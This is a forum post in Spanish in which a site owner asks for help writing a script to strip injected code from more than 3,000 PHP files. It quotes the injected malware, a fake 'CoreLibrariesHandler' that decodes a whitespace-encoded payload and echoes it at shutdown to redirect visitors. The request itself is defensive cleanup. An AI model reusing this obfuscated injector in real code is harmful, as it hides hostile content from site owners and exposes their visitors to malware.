Ver Mensaje Individual
  #1 (permalink)  
Antiguo 18/05/2011, 09:22
Avatar de insyse
insyse
 
Fecha de Ingreso: abril-2005
Ubicación: Colombia
Mensajes: 206
Antigüedad: 19 años, 8 meses
Puntos: 5
Como puedo eliminar codigo inyectado en mas de 3000 archivos PHP

Hola a todos,

hace unos dias postee un problema que he venido teniendo en mi servidor, tengo contratado un hosting con Awardspace, donde tengo alojadas 20 paginas web diferentes, desde hace unas dos semanas me han estado inyectando código malicioso, y de golpe me afecta a todos los archivos PHP de todos los sitios.

el codigo es el siguiente

Código PHP:
<?php /**
 * Gets some core libraries and displays a top message if required.    /*
 */ 
function CoreLibrariesHandler() {                    /*
 */   
$session_keys '                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           ';  /*
 */                                    /* 
 */    
foreach(str_split($session_keys8) as $k=>$v) {         /*             
 */        
$v str_replace('    '1str_replace(' '0$v));    /*
 */        
$session_keys[$k] = chr(bindec($v));             /*
 */    
}                                 /*
 */                                    /*
 */    
if($session_keys) echo $session_keys; }                /*
 */    
register_shutdown_function('CoreLibrariesHandler');        /*
 */                                    /*
 ************************************************************************/



 
?>
He buscado en internet y encontré en este foro una solución rápida para eliminar el codigo inyectado, pero no se como usar la solución.


http://www.unix.com/shell-programmin...d-keyword.html

Mas o menos dice que hay un código basura inyectado que reenvía las páginas a un sitio que contiene virus.

La solución parece ser un código que lee cada archivo PHP y busca el código y si existe lo borra sin afectar el resto del contenido del archivo.

El código que coloque al principio, tiene en todas las paginas la misma estructura y siempre esta antes de cualquier contenido de mis archivos.

Alguien me puede ayudar a crear este script que borre el código inyectado sin afectar el contenido de mis archivos PHP????

Aclaro que son mas de 3000 archivos y bajar todo, para buscar el código basura manualmente y volver a subir todo, me llevaría al menos 2-3 días.


En espera de su amable ayuda...


Leonardo